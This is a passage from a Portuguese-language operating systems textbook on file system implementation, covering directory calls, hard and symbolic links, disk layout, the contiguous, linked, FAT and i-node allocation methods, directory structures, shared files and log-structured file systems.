4. Closedir. Quando um diretório tiver sido lido, ele 
será fechado para liberar espaço de tabela interno. 

5. Readdir. Essa chamada retorna a próxima entrada 
em um diretório aberto. Antes, era possível ler di- 
retórios usando a chamada de sistema read usual, 
mas essa abordagem tem a desvantagem de for- 
çar o programador a saber e lidar com a estrutura 
interna de diretórios. Por outro lado, readdir sem- 
pre retorna uma entrada em um formato padrão, 
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não importa qual das estruturas de diretório pos- 
síveis está sendo usada. 

6. Rename. Em muitos aspectos, diretórios são 
como arquivos e podem ser renomeados da mes- 
ma maneira que eles. 

7. Link. A ligação (linking) é uma técnica que per- 
mite que um arquivo apareça em mais de um di- 
retório. Essa chamada de sistema especifica um 
arquivo existente e um nome de caminho, e cria 
uma ligação do arquivo existente para o nome 
especificado pelo caminho. Dessa maneira, o 
mesmo arquivo pode aparecer em múltiplos di- 
retórios. Uma ligação desse tipo, que incrementa 
o contador no i-node do arquivo (para monito- 
rar o número de entradas de diretório contendo o 
arquivo), às vezes é chamada de ligação estrita 
(hard link). 

8. Unlink. Uma entrada de diretório é removida. Se o 
arquivo sendo removido estiver presente somente 
em um diretório (o caso normal), ele é removido 
do sistema de arquivos. Se ele estiver presente em 
múltiplos diretórios, apenas o nome do caminho 
especificado é removido. Os outros continuam. 
Em UNIX, a chamada de sistema para remover 
arquivos (discutida anteriormente) é, na realida- 
de, unlink. 


A lista anterior mostra as chamadas mais importan- 
tes, mas há algumas outras também, por exemplo, para 
gerenciar a informação de proteção associada com um 
diretório. 

Uma variação da ideia da ligação de arquivos é a 
ligação simbólica. Em vez de ter dois nomes apontando 
para a mesma estrutura de dados interna representan- 
do um arquivo, um nome pode ser criado que aponte 
para um arquivo minúsculo que nomeia outro arquivo. 
Quando o primeiro é usado — aberto, por exemplo — o 
sistema de arquivos segue o caminho e encontra o nome 
no fim. Então ele começa todo o processo de localização 
usando o novo nome. Ligações simbólicas têm a vanta- 
gem de conseguirem atravessar as fronteiras de discos e 
mesmo nomear arquivos em computadores remotos. No 
entanto, sua implementação é de certa maneira menos 
eficiente do que as ligações estritas. 


4.3 Implementação do sistema 
de arquivos 


Agora chegou o momento de passar da visão do usu- 
ário do sistema de arquivos para a do implementador. 
Usuários estão preocupados em como os arquivos são 
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nomeados, quais operações são permitidas neles, como 
é a árvore de diretórios e questões de interface simi- 
lares. Implementadores estão interessados em como os 
arquivos e os diretórios estão armazenados, como o es- 
paço de disco é gerenciado e como fazer tudo funcionar 
de maneira eficiente e confiável. Nas seções a seguir 
examinaremos uma série dessas áreas para ver quais são 
as questões e compromissos envolvidos. 


4.3.1 Esquema do sistema de arquivos 


Sistemas de arquivos são armazenados em discos. A 
maioria dos discos pode ser dividida em uma ou mais 
partições, com sistemas de arquivos independentes em 
cada partição. O Setor O do disco é chamado de MBR 
(Master Boot Record — registro mestre de inicializa- 
ção) e é usado para inicializar o computador. O fim do 
MBR contém a tabela de partição. Ela dá os endereços 
de início e fim de cada partição. Uma das partições da 
tabela é marcada como ativa. Quando o computador é 
inicializado, a BIOS lê e executa o MBR. A primeira 
coisa que o programa MBR faz é localizar a partição 
ativa, ler seu primeiro bloco, que é chamado de bloco 
de inicialização, e executá-lo. O programa no bloco de 
inicialização carrega o sistema operacional contido na- 
quela partição. Por uniformidade, cada partição começa 
com um bloco de inicialização, mesmo que ela não con- 
tenha um sistema operacional que possa ser inicializa- 
do. Além disso, a partição poderá conter um no futuro. 

Fora iniciar com um bloco de inicialização, o esque- 
ma de uma partição de disco varia bastante entre siste- 
mas de arquivos. Muitas vezes o sistema de arquivos 
vai conter alguns dos itens mostrados na Figura 4.9. O 
primeiro é o superbloco. Ele contém todos os parâme- 
tros-chave a respeito do sistema de arquivos e é lido 
para a memória quando o computador é inicializado ou 
o sistema de arquivos é tocado pela primeira vez. In- 
formações típicas no superbloco incluem um número 
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mágico para identificar o tipo de sistema de arquivos, 
seu número de blocos e outras informações administra- 
tivas fundamentais. 

Em seguida podem vir informações a respeito de 
blocos disponíveis no sistema de arquivos, na forma 
de um mapa de bits ou de uma lista de ponteiros, por 
exemplo. Isso pode ser seguido pelos i-nodes, um ar- 
ranjo de estruturas de dados, um por arquivo, dizendo 
tudo sobre ele. Depois pode vir o diretório-raiz, que 
contém o topo da árvore do sistema de arquivos. Por 
fim, o restante do disco contém todos os outros diretó- 
rios e arquivos. 


4.3.2 Implementando arquivos 


É provável que a questão mais importante na imple- 
mentação do armazenamento de arquivos seja controlar 
quais blocos de disco vão com quais arquivos. Vários 
métodos são usados em diferentes sistemas operacio- 
nais. Nesta seção, examinaremos alguns deles. 


Alocação contígua 


O esquema de alocação mais simples é armazenar 
cada arquivo como uma execução contígua de blocos 
de disco. Assim, em um disco com blocos de 1 KB, um 
arquivo de 50 KB seria alocado em 50 blocos conse- 
cutivos. Com blocos de 2 KB, ele seria alocado em 25 
blocos consecutivos. 

Vemos um exemplo de alocação em armazenamento 
contíguo na Figura 4.10(a). Aqui os primeiros 40 blocos 
de disco são mostrados, começando com o bloco 0 à 
esquerda. De início, o disco estava vazio. Então um ar- 
quivo 4, de quatro blocos de comprimento, foi escrito a 
partir do início (bloco 0). Após isso, um arquivo de seis 
blocos, B, foi escrito começando logo depois do fim do 
arquivo 4. 





Partição 
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Bloco de Gerenciamento ae : F ee 
due apa ears : I-nodes Diretório-raiz | Arquiv iretórios 
inicialização Superbloco de espaço livre etório-ra quivos e d 


Observe que cada arquivo começa no início de um 
bloco novo; portanto, se o arquivo 4 realmente ocupar 
3% blocos, algum espaço será desperdiçado ao fim de 
cada último bloco. Na figura, um total de sete arquivos 
é mostrado, cada um começando no bloco seguinte ao 
final do anterior. O sombreamento é usado apenas para 
tornar mais fácil a distinção entre os blocos. Não tem 
significado real em termos de armazenamento. 

A alocação de espaço de disco contíguo tem duas 
vantagens significativas. Primeiro, ela é simples de im- 
plementar porque basta se lembrar de dois números para 
monitorar onde estão os blocos de um arquivo: o ende- 
reço em disco do primeiro bloco e o número de blocos 
no arquivo. Dado o número do primeiro bloco, o núme- 
ro de qualquer outro bloco pode ser encontrado median- 
te uma simples adição. 

Segundo, o desempenho da leitura é excelente, pois 
o arquivo inteiro pode ser lido do disco em uma única 
operação. Apenas uma busca é necessária (para o pri- 
meiro bloco). Depois, não são mais necessárias buscas 
ou atrasos rotacionais, então os dados são lidos com a 
capacidade total do disco. Portanto, a alocação contígua 
é simples de implementar e tem um alto desempenho. 

Infelizmente, a alocação contígua tem um ponto fra- 
co importante: com o tempo, o disco torna-se fragmen- 
tado. Para ver como isso acontece, examine a Figura 
4.10(b). Aqui dois arquivos, D e F, foram removidos. 
Quando um arquivo é removido, seus blocos são na- 
turalmente liberados, deixando uma lacuna de blocos 
livres no disco. O disco não é compactado imediata- 
mente para eliminá-la, já que isso envolveria copiar 
todos os blocos seguindo essa lacuna, potencialmente 
milhões de blocos, o que levaria horas ou mesmo dias 
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em discos grandes. Como resultado, em última análise 
o disco consiste em arquivos e lacunas, como ilustrado 
na figura. 

De início, essa fragmentação não é problema, já que 
cada novo arquivo pode ser escrito ao final do disco, se- 
guindo o anterior. No entanto, finalmente o disco estará 
cheio e será necessário compactá-lo, o que tem custo 
proibitivo, ou reutilizar os espaços livres nas lacunas. 
Reutilizar o espaço exige manter uma lista de lacunas, 
o que é possível. No entanto, quando um arquivo novo 
vai ser criado, é necessário saber o seu tamanho final 
a fim de escolher uma lacuna do tamanho correto para 
alocá-lo. 

Imagine as consequências de um projeto desses. O usu- 
ário inicializa um processador de texto a fim de criar um 
documento. A primeira coisa que o programa pergunta é 
quantos bytes o documento final terá. A pergunta deve ser 
respondida ou o programa não continuará. Se o número 
em última análise provar-se pequeno demais, o programa 
precisará ser terminado prematuramente, pois a lacuna do 
disco estará cheia e não haverá lugar para colocar o resto 
do arquivo. Se o usuário tentar evitar esse problema dando 
um número irrealisticamente grande como o tamanho fi- 
nal, digamos, 1 GB, o editor talvez não consiga encontrar 
uma lacuna tão grande e anunciará que o arquivo não pode 
ser criado. É claro, o usuário estaria livre para inicializar o 
programa novamente e dizer 500 MB dessa vez, e assim 
por diante até que uma lacuna adequada fosse localizada. 
Ainda assim, é pouco provável que esse esquema deixe os 
usuários felizes. 

No entanto, há uma situação na qual a alocação 
contígua é possível e, na realidade, ainda usada: em 
CD-ROMs. Aqui todos os tamanhos de arquivos são 
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conhecidos antecipadamente e jamais mudarão durante 
o uso subsequente do sistema de arquivos do CD-ROM. 

A situação com DVDs é um pouco mais complica- 
da. Em princípio, um filme de 90 minutos poderia ser 
codificado como um único arquivo de comprimento de 
cerca de 4,5 GB, mas o sistema de arquivos utilizado, 
UDF (Universal Disk Format — formato universal 
de disco), usa um número de 30 bits para representar o 
tamanho do arquivo, o que limita os arquivos a 1 GB. 
Em consequência, filmes em DVD são em geral arma- 
zenados contiguamente como três ou quatro arquivos de 
1 GB. Esses pedaços físicos do único arquivo lógico (o 
filme) são chamados de extensões. 

Como mencionamos no Capítulo 1, a história muitas 
vezes se repete na ciência de computadores à medida que 
surgem novas gerações de tecnologia. A alocação conti- 
gua na realidade foi usada nos sistemas de arquivos de 
discos magnéticos anos atrás pela simplicidade e alto de- 
sempenho (a facilidade de uso para o usuário não contava 
muito à época). Então a ideia foi abandonada por causa 
do incômodo de ter de especificar o tamanho final do ar- 
quivo no momento de sua criação. Mas com o advento 
dos CD-ROMs, DVDs, Blu-rays e outras mídias óticas 
para escrita única, subitamente arquivos contíguos eram 
uma boa ideia de novo. Desse modo, é importante estudar 
sistemas e ideias antigas que eram conceitualmente lim- 
pas e simples, pois elas podem ser aplicáveis a sistemas 
futuros de maneiras surpreendentes. 


Alocação por lista encadeada 


O segundo método para armazenar arquivos é man- 
ter cada um como uma lista encadeada de blocos de dis- 
co, como mostrado na Figura 4.11. A primeira palavra 
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de cada bloco é usada como um ponteiro para a próxi- 
ma. O resto do bloco é reservado para dados. 

Diferentemente da alocação contígua, todos os blo- 
cos do disco podem ser usados nesse método. Nenhum 
espaço é perdido para a fragmentação de disco (exceto 
para a fragmentação interna no último bloco). Também, 
para a entrada de diretório é suficiente armazenar mera- 
mente o endereço em disco do primeiro bloco. O resto 
pode ser encontrado a partir daí. 

Por outro lado, embora a leitura de um arquivo se- 
quencialmente seja algo direto, o acesso aleatório é de 
extrema lentidão. Para chegar ao bloco n, o sistema ope- 
racional precisa começar do início e ler os blocos n — 1 
antes dele, um de cada vez. É claro que realizar tantas 
leituras será algo dolorosamente lento. 

Também, a quantidade de dados que um bloco pode 
armazenar não é mais uma potência de dois, pois os 
ponteiros ocupam alguns bytes do bloco. Embora não 
seja fatal, ter um tamanho peculiar é menos eficiente, 
pois muitos programas leem e escrevem em blocos cujo 
tamanho é uma potência de dois. Com os primeiros 
bytes de cada bloco ocupados por um ponteiro para o 
próximo bloco, a leitura de todo o bloco exige que se 
adquira e concatene a informação de dois blocos de dis- 
co, o que gera uma sobrecarga extra por causa da cópia. 


Alocação por lista encadeada usando uma tabela na 
memória 


Ambas as desvantagens da alocação por lista enca- 
deada podem ser eliminadas colocando-se as palavras 
do ponteiro de cada bloco de disco em uma tabela na 
memória. A Figura 4.12 mostra como são as tabelas 
para o exemplo da Figura 4.11. Em ambas, temos dois 
arquivos. O arquivo A usa os blocos de disco 4, 7, 2, 10 
e 12, nessa ordem, e o arquivo B usa os blocos de disco 
6, 3, 11 e 14, nessa ordem. Usando a tabela da Figura 
4.12, podemos começar com o bloco 4 e seguir a cadeia 
até o fim. O mesmo pode ser feito começando com o 
bloco 6. Ambos os encadeamentos são concluídos com 
uma marca especial (por exemplo, —1) que corresponde 
a um número de bloco inválido. Essa tabela na memória 
principal é chamada de FAT (File Allocation Table — 
tabela de alocação de arquivos). 

Usando essa organização, o bloco inteiro fica dispo- 
nível para dados. Além disso, o acesso aleatório é muito 
mais fácil. Embora ainda seja necessário seguir o enca- 
deamento para encontrar um determinado deslocamento 
dentro do arquivo, o encadeamento está inteiramente na 
memória, portanto ele pode ser seguido sem fazer quais- 
quer referências ao disco. Da mesma maneira que no 


[FIGURA 4.12 | Alocação por lista encadeada usando uma tabela 
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método anterior, é suficiente para a entrada de diretório 
manter um único inteiro (o número do bloco inicial) e 
ainda assim ser capaz de localizar todos os blocos, não 
importa o tamanho do arquivo. 

A principal desvantagem desse método é que a tabe- 
la inteira precisa estar na memória o todo o tempo para 
fazê-la funcionar. Com um disco de 1 TB e um tama- 
nho de bloco de 1 KB, a tabela precisa de 1 bilhão de 
entradas, uma para cada um dos 1 bilhão de blocos de 
disco. Cada entrada precisa ter no mínimo 3 bytes. Para 
aumentar a velocidade de consulta, elas deveriam ter 
4 bytes. Desse modo, a tabela ocupará 3 GB ou 2,4 GB 
da memória principal o tempo inteiro, dependendo de 
o sistema estar otimizado para espaço ou tempo. Não é 
algo muito prático. Claro, a ideia da FAT não se adap- 
ta bem para discos grandes. Era o sistema de arquivos 
MS-DOS original e ainda é aceito completamente por 
todas as versões do Windows. 


l-nodes 


Nosso último método para monitorar quais blocos 
pertencem a quais arquivos é associar cada arquivo a 
uma estrutura de dados chamada de i-node (index-node 
— nó-índice), que lista os atributos e os endereços de 
disco dos blocos do disco. Um exemplo simples é des- 
crito na Figura 4.13. Dado o i-node, é então possível en- 
contrar todos os blocos do arquivo. A grande vantagem 
desse esquema sobre os arquivos encadeados usando 
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Endereço do bloco 0 do disco 
Endereço do bloco 1 do disco 
Endereço do bloco 2 do disco 
Endereço do bloco 3 do disco 
Endereço do bloco 4 do disco 
Endereço do bloco 5 do disco 
Endereço do bloco 6 do disco 


Endereço do bloco 7 do disco 


Endereço de bloco de ponteiros 
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uma tabela na memória é que o i-node precisa estar na 
memória apenas quando o arquivo correspondente esti- 
ver aberto. Se cada i-node ocupa n bytes e um máximo 
de k arquivos puderem estar abertos simultaneamente, 
a memória total ocupada pelo arranjo contendo os i- 
-nodes para os arquivos abertos é de apenas kn bytes. 
Apenas essa quantidade de espaço precisa ser reservada 
antecipadamente. 

Esse arranjo é em geral muito menor do que o es- 
paço ocupado pela tabela de arquivos descrita na seção 
anterior. A razão é simples. A tabela para conter a lista 
encadeada de todos os blocos de disco é proporcional 
em tamanho ao disco em si. Se o disco tem n blocos, 
a tabela precisa de n entradas. À medida que os discos 
ficam maiores, essa tabela cresce linearmente com eles. 
Por outro lado, o esquema i-node exige um conjunto na 
memória cujo tamanho seja proporcional ao número má- 
ximo de arquivos que podem ser abertos ao mesmo tem- 
po. Não importa que o disco tenha 100 GB, 1.000 GB 
ou 10.000 GB. 

Um problema com i-nodes é que se cada um tem es- 
paço para um número fixo de endereços de disco, o que 
acontece quando um arquivo cresce além de seu limite? 
Uma solução é reservar o último endereço de disco não 
para um bloco de dados, mas, em vez disso, para o en- 
dereço de um bloco contendo mais endereços de blocos 
de disco, como mostrado na Figura 4.13. Mais avança- 
do ainda seria ter dois ou mais desses blocos contendo 
endereços de disco ou até blocos de disco apontando 
para outros blocos cheios de endereços. Voltaremos aos 
i-nodes quando estudarmos o UNIX no Capítulo 10. 
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De modo similar, o sistema de arquivos NTFS do Win- 
dows usa uma ideia semelhante, apenas com i-nodes 
maiores, que também podem conter arquivos pequenos. 


4.3.3 Implementando diretórios 


Antes que um arquivo possa ser lido, ele precisa ser 
aberto. Quando um arquivo é aberto, o sistema opera- 
cional usa o nome do caminho fornecido pelo usuário 
para localizar a entrada de diretório no disco. A entra- 
da de diretório fornece a informação necessária para 
encontrar os blocos de disco. Dependendo do sistema, 
essa informação pode ser o endereço de disco do ar- 
quivo inteiro (com alocação contígua), o número do 
primeiro bloco (para ambos os esquemas de listas en- 
cadeadas), ou o número do i-node. Em todos os casos, 
a principal função do sistema de diretórios é mapear o 
nome do arquivo em ASCII na informação necessária 
para localizar os dados. 

Uma questão relacionada de perto refere-se a onde 
os atributos devem ser armazenados. Todo sistema de 
arquivos mantém vários atributos do arquivo, como o 
proprietário de cada um e seu momento de criação, e 
eles devem ser armazenados em algum lugar. Uma pos- 
sibilidade óbvia é fazê-lo diretamente na entrada do di- 
retório. Alguns sistemas fazem precisamente isso. Essa 
opção é mostrada na Figura 4.14(a). Nesse design sim- 
ples, um diretório consiste em uma lista de entradas de 
tamanho fixo, um por arquivo, contendo um nome de 
arquivo (de tamanho fixo), uma estrutura dos atributos 
do arquivo e um ou mais endereços de disco (até algum 
máximo) dizendo onde estão os blocos de disco. 

Para sistemas que usam i-nodes, outra possibilidade 
para armazenar os atributos é nos próprios i-nodes, em 
vez de nas entradas do diretório. Nesse caso, a entrada 
do diretório pode ser mais curta: apenas um nome de 
arquivo e um número de i-node. Essa abordagem está 


ilustrada na Figura 4.14(b). Como veremos mais tarde, 
esse método tem algumas vantagens sobre colocá-los na 
entrada do diretório. 

Até o momento presumimos que os arquivos têm no- 
mes curtos de tamanho fixo. No MS-DOS, os arquivos 
têm um nome base de 1-8 caracteres e uma extensão op- 
cional de 1-3 caracteres. Na Versão 7 do UNIX, os nomes 
dos arquivos tinham 1-14 caracteres, incluindo quaisquer 
extensões. No entanto, quase todos os sistemas operacio- 
nais modernos aceitam nomes de arquivos maiores e de 
tamanho variável. Como eles podem ser implementados? 

A abordagem mais simples é estabelecer um limite 
para o tamanho do nome dos arquivos e então usar um 
dos designs da Figura 4.14 com 255 caracteres reser- 
vados para cada nome de arquivo. Essa abordagem é 
simples, mas desperdiça muito espaço de diretório, já 
que poucos arquivos têm nomes tão longos. Por razões 
de eficiência, uma estrutura diferente é desejável. 

Uma alternativa é abrir mão da ideia de que todas as 
entradas de diretório sejam do mesmo tamanho. Com 
esse método, cada entrada de diretório contém uma por- 
ção fixa, começando com o tamanho da entrada e, então, 
seguido por dados com um formato fixo, normalmente 
incluindo o proprietário, momento de criação, informa- 
ções de proteção e outros atributos. Esse cabeçalho de 
comprimento fixo é seguido pelo nome do arquivo real, 
não importa seu tamanho, como mostrado na Figura 
4.15(a) em um formato em que o byte mais significativo 
aparece primeiro (big-endian) — SPARC, por exemplo. 
Nesse exemplo, temos três arquivos, project-budget, 
personnel e foo. Cada nome de arquivo é concluído com 
um caractere especial (em geral 0), que é representado 
na figura por um quadrado com um “X” dentro. Para 
permitir que cada entrada de diretório comece junto ao 
limite de uma palavra, cada nome de arquivo é preen- 
chido de modo a completar um número inteiro de pala- 
vras, indicado pelas caixas sombreadas na figura. 


Ke BES (a) Um diretório simples contendo entradas de tamanho fixo com endereços de disco e atributos na entrada do diretório. 
(b) Um diretório no qual cada entrada refere-se a apenas um i-node. 
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le SF Duas maneiras de gerenciar nomes de arquivos longos em um diretório. (a) Sequencialmente. (b) No heap. 
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Uma desvantagem desse método é que, quando um 
arquivo é removido, uma lacuna de tamanho variável 
é introduzida no diretório e o próximo arquivo a entrar 
poderá não caber nela. Esse problema é na essência o 
mesmo que vimos com arquivos de disco contíguos, 
apenas agora é possível compactar o diretório, pois ele 
está inteiramente na memória. Outro problema é que 
uma única entrada de diretório pode se estender por 
múltiplas páginas, de maneira que uma falta de página 
pode ocorrer durante a leitura de um nome de arquivo. 

Outra maneira de lidar com nomes de tamanhos 
variáveis é tornar fixos os tamanhos das próprias en- 
tradas de diretório e manter os nomes dos arquivos em 
um heap (monte) no fim de cada diretório, como mos- 
trado na Figura 4.15(b). Esse método tem a vantagem 
de que, quando uma entrada for removida, o arquivo 
seguinte inserido sempre caberá ali. É claro, o heap 
deve ser gerenciado e faltas de páginas ainda podem 
ocorrer enquanto processando nomes de arquivos. Um 
ganho menor aqui é que não há mais nenhuma neces- 
sidade real para que os nomes dos arquivos comecem 
junto aos limites das palavras, de maneira que não é 
mais necessário completar os nomes dos arquivos com 
caracteres na Figura 4.15(b) como eles são na Figura 
4.15(a). 

Em todos os projetos apresentados até o momento, os 
diretórios são pesquisados linearmente do início ao fim 
quando o nome de um arquivo precisa ser procurado. 
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Para diretórios extremamente longos, a busca linear 
pode ser lenta. Uma maneira de acelerar a busca é usar 
uma tabela de espalhamento em cada diretório. Defina 
o tamanho da tabela n. Ao entrar com um nome de ar- 
quivo, o nome é mapeado em um valor entre 0 en — 1, 
por exemplo, dividindo-o por n e tomando-se o resto. 
Alternativamente, as palavras compreendendo o nome 
do arquivo podem ser somadas e essa quantidade divi- 
dida por n, ou algo similar. 

De qualquer maneira, a entrada da tabela correspon- 
dendo ao código de espalhamento é verificada. Entradas 
de arquivo seguem a tabela de espalhamento. Se aquela 
vaga já estiver em uso, uma lista encadeada é construi- 
da, inicializada naquela entrada da tabela e unindo todas 
as entradas com o mesmo valor de espalhamento. 

A procura por um arquivo segue o mesmo procedi- 
mento. O nome do arquivo é submetido a uma função 
de espalhamento para selecionar uma entrada da tabela 
de espalhamento. Todas as entradas da lista encadeada 
inicializada naquela vaga são verificadas para ver se o 
nome do arquivo está presente. Se o nome não estiver 
na lista, o arquivo não está presente no diretório. 

Usar uma tabela de espalhamento tem a vantagem 
de uma busca muito mais rápida, mas a desvantagem 
de uma administração mais complexa. Ela é uma alter- 
nativa realmente séria apenas em sistemas em que é es- 
perado que os diretórios contenham de modo rotineiro 
centenas ou milhares de arquivos. 
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Uma maneira diferente de acelerar a busca em gran- 
des diretórios é colocar os resultados em uma cache de 
buscas. Antes de começar uma busca, é feita primeiro 
uma verificação para ver se o nome do arquivo está 
na cache. Se estiver, ele pode ser localizado de imedia- 
to. É claro, a cache só funciona se um número relati- 
vamente pequeno de arquivos compreender a maioria 
das buscas. 


4.3.4 Arquivos compartilhados 


Quando vários usuários estão trabalhando juntos em 
um projeto, eles muitas vezes precisam compartilhar ar- 
quivos. Em consequência, muitas vezes é conveniente 
que um arquivo compartilhado apareça simultaneamen- 
te em diretórios diferentes pertencendo a usuários dis- 
tintos. A Figura 4.16 mostra o sistema de arquivos da 
Figura 4.7 novamente, apenas com um dos arquivos do 
usuário C agora presente também em um dos diretórios 
do usuário B. A conexão entre o diretório do usuário 


le) ES Sistema de arquivos contendo um arquivo 
compartilhado. 





Arquivo compartilhado 


B e o arquivo compartilhado é chamada de ligação. O 
sistema de arquivos em si é agora um Gráfico Acícli- 
co Orientado (Directed Acyclic Graph — DAG), em 
vez de uma árvore. Ter o sistema de arquivos como um 
DAG complica a manutenção, mas a vida é assim. 

Compartilhar arquivos é conveniente, mas também 
apresenta alguns problemas. Para começo de conversa, 
se os diretórios realmente contiverem endereços de dis- 
co, então uma cópia desses endereços terá de ser feita no 
diretório do usuário B quando o arquivo for ligado. Se B 
ou C subsequentemente adicionarem blocos ao arquivo, 
os novos blocos serão listados somente no diretório do 
usuário que estiver realizando a adição. As mudanças 
não serão visíveis ao outro usuário, derrotando então o 
propósito do compartilhamento. 

Esse problema pode ser solucionado de duas manei- 
ras. Na primeira solução, os blocos de disco não são 
listados em diretórios, mas em uma pequena estrutura 
de dados associada com o arquivo em si. Os diretórios 
apontariam então apenas para a pequena estrutura de 
dados. Essa é a abordagem usada em UNIX (em que a 
pequena estrutura de dados é o i-node). 

Na segunda solução, B se liga a um dos arquivos de 
C, obrigando o sistema a criar um novo arquivo do tipo 
LINK e a inseri-lo no diretório de B. O novo arquivo 
contém apenas o nome do caminho do arquivo para o 
qual ele está ligado. Quando B lê do arquivo ligado, o 
sistema operacional vê que o arquivo sendo lido é do 
tipo LINK, verifica seu nome e o lê. Essa abordagem é 
chamada de ligação simbólica, para contrastar com a 
ligação (estrita) tradicional. 

Cada um desses métodos tem seus problemas. No 
primeiro, no momento em que B se liga com o arquivo 
compartilhado, o i-node grava o proprietário do arquivo 
como C. Criar uma ligação não muda a propriedade (ver 
Figura 4.17), mas aumenta o contador de ligações no 
i-node, então o sistema sabe quantas entradas de diretó- 
rio apontam no momento para o arquivo. 


geii: E SrA (a) Situação antes da ligação. (b) Depois da criação da ligação. (c) Depois que o proprietário original remove o arquivo. 
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Se C subsequentemente tentar remover o arquivo, o 
sistema se vê diante de um dilema. Se remover o ar- 
quivo e limpar o i-node, B terá uma entrada de diretó- 
rio apontando para um i-node inválido. Se o i-node for 
transferido mais tarde para outro arquivo, a ligação de 
B apontará para o arquivo errado. O sistema pode ava- 
liar, a partir do contador no i-node, que o arquivo ainda 
está em uso, mas não há uma maneira fácil de encontrar 
todas as entradas de diretório para o arquivo a fim de 
removê-las. Ponteiros para os diretórios não podem ser 
armazenados no i-node, pois pode haver um número ili- 
mitado de diretórios. 

A única coisa a fazer é remover a entrada de diretório 
de C, mas deixar o i-node intacto, com o contador em 
1, como mostrado na Figura 4.17(c). Agora temos uma 
situação na qual B é o único usuário com uma entrada 
de diretório para um arquivo cujo proprietário é C. Se o 
sistema fizer contabilidade ou tiver cotas, C continuará 
pagando a conta pelo arquivo até que B decida removê- 
-lo. Se B o fizer, nesse momento o contador vai para 0 e 
o arquivo é removido. 

Com ligações simbólicas esse problema não surge, 
pois somente o verdadeiro proprietário tem um pontei- 
ro para o i-node. Os usuários que têm ligações para o 
arquivo possuem apenas nomes de caminhos, não pon- 
teiros de i-node. Quando o proprietário remove o arqui- 
vo, ele é destruído. Tentativas subsequentes de usar o 
arquivo por uma ligação simbólica fracassarão quando 
o sistema for incapaz de localizá-lo. Remover uma liga- 
ção simbólica não afeta o arquivo de maneira alguma. 

O problema com ligações simbólicas é a sobrecar- 
ga extra necessária. O arquivo contendo o caminho 
deve ser lido, então ele deve ser analisado e seguido, 
componente a componente, até que o i-node seja al- 
cançado. Toda essa atividade pode exigir um núme- 
ro considerável de acessos adicionais ao disco. Além 
disso, um i-node extra é necessário para cada ligação 
simbólica, assim como um bloco de disco extra para 
armazenar o caminho, embora se o nome do caminho 
for curto, o sistema poderá armazená-lo no próprio 
i-node, como um tipo de otimização. Ligações sim- 
bólicas têm a vantagem de poderem ser usadas para 
ligar os arquivos em máquinas em qualquer parte no 
mundo, simplesmente fornecendo o endereço de rede 
da máquina onde o arquivo reside, além de seu cami- 
nho naquela máquina. 

Há também outro problema introduzido pelas liga- 
ções, simbólicas ou não. Quando as ligações são per- 
mitidas, os arquivos podem ter dois ou mais caminhos. 
Programas que inicializam em um determinado diretó- 
rio e encontram todos os arquivos naquele diretório e 
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seus subdiretórios, localizarao um arquivo ligado multi- 
plas vezes. Por exemplo, um programa que salva todos 
os arquivos de um diretório e seus subdiretórios em uma 
fita poderá fazer múltiplas cópias de um arquivo ligado. 
Além disso, se a fita for lida então em outra máquina, a 
não ser que o programa que salva para a fita seja inteli- 
gente, o arquivo ligado será copiado duas vezes para o 
disco, em vez de ser ligado. 


4.3.5 Sistemas de arquivos estruturados 
em diário (log) 


Mudanças na tecnologia estão pressionando os sis- 
temas de arquivos atuais. Em particular, CPUs estão 
ficando mais rápidas, discos tornam-se muito maiores 
e baratos (mas não muito mais rápidos), e as memórias 
crescem exponencialmente em tamanho. O único pará- 
metro que não está se desenvolvendo de maneira tão 
acelerada é o tempo de busca dos discos (exceto para 
discos em estado sólido, que não têm tempo de busca). 

A combinação desses fatores significa que um gar- 
galo de desempenho está surgindo em muitos sistemas 
de arquivos. Pesquisas realizadas em Berkeley tentaram 
minimizar esse problema projetando um tipo completa- 
mente novo de sistema de arquivos, o LFS (Log-struc- 
tured File System — sistema de arquivos estruturado 
em diário). Nesta seção, descreveremos brevemente 
como o LFS funciona. Para uma abordagem mais com- 
pleta, ver o estudo original sobre LFS (ROSENBLUM 
e OUSTERHOUT, 1991). 

A ideia que impeliu o design do LFS é de que à me- 
dida que as CPUs ficam mais rápidas e as memórias 
RAM maiores, caches em disco também estão aumen- 
tando rapidamente. Em consequência, agora é possível 
satisfazer uma fração muito substancial de todas as so- 
licitações de leitura diretamente da cache do sistema de 
arquivos, sem a necessidade de um acesso de disco. Se- 
gue dessa observação que, no futuro, a maior parte dos 
acessos ao disco será para escrita, então o mecanismo de 
leitura antecipada usado em alguns sistemas de arqui- 
vos para buscar blocos antes que eles sejam necessários 
não proporciona mais um desempenho significativo. 

Para piorar as coisas, na maioria dos sistemas de ar- 
quivos, as operações de escrita são feitas em pedaços 
muito pequenos. Escritas pequenas são altamente inefi- 
cientes, dado que uma escrita em disco de 50 us muitas 
vezes é precedida por uma busca de 10 ms e um atraso 
rotacional de 4 ms. Com esses parâmetros, a eficiência 
dos discos cai para uma fração de 1%. 

A fim de entender de onde vêm todas essas peque- 
nas operações de escrita, considere criar um arquivo 
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novo em um sistema UNIX. Para escrever esse ar- 
quivo, o i-node para o diretório, o bloco do diretório, 
o i-node para o arquivo e o próprio arquivo devem 
ser todos escritos. Embora essas operações possam 
ser postergadas, fazê-lo expõe o sistema de arquivos 
a sérios problemas de consistência se uma queda no 
sistema ocorrer antes que as escritas tenham sido con- 
cluídas. Por essa razão, as escritas de i-node são, em 
geral, feitas imediatamente. 

A partir desse raciocínio, os projetistas do LFS de- 
cidiram reimplementar o sistema de arquivos UNIX de 
maneira que fosse possível utilizar a largura total da 
banda do disco, mesmo diante de uma carga de trabalho 
consistindo em grande parte de pequenas operações de 
escrita aleatórias. A ideia básica é estruturar o disco in- 
teiro como um grande diário (log). 

De modo periódico, e quando há uma necessidade 
especial para isso, todas as operações de escrita pen- 
dentes armazenadas na memória são agrupadas em um 
único segmento e escritas para o disco como um único 
segmento contíguo ao fim do diário. Desse modo, um 
único segmento pode conter i-nodes, blocos de diretó- 
rio e blocos de dados, todos misturados. No começo de 
cada segmento há um resumo do segmento, dizendo o 
que pode ser encontrado nele. Se o segmento médio pu- 
der ser feito com o tamanho de cerca de 1 MB, quase 
toda a largura de banda de disco poderá ser utilizada. 

Neste projeto, i-nodes ainda existem e têm até a mes- 
ma estrutura que no UNIX, mas estão dispersos agora 
por todo o diário, em vez de ter uma posição fixa no 
disco. Mesmo assim, quando um i-node é localizado, 
a localização dos blocos acontece da maneira usual. É 
claro, encontrar um i-node é muito mais difícil agora, já 
que seu endereço não pode ser simplesmente calculado 
a partir do seu i-número, como no UNIX. Para tornar 
possível encontrar i-nodes, é mantido um mapa do i- 
